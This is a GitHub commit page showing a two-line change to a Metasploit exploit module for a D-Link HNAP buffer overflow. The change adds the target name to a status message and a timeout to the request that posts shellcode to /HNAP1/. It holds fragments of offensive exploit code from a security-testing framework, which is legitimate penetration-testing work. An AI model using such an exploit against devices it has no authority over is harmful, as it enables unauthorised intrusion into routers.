We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent dea68c6 commit b9cda51Copy full SHA for b9cda51
modules/exploits/linux/http/dlink_hnap_bof.rb
@@ -108,7 +108,7 @@ def exploit
108
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
109
end
110
111
- print_status("#{peer} - Exploiting ...")
+ print_status("#{peer} - Exploiting #{@my_target.name}...")
112
execute_cmdstager(
113
:flavor => :echo,
114
:linemax => 185
@@ -143,7 +143,7 @@ def execute_command(cmd, opts)
143
'uri' => "/HNAP1/",
144
'encode_params' => false,
145
'data' => shellcode
146
- })
+ }, 5)
147
return res
148
rescue ::Rex::ConnectionError
149
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
0 commit comments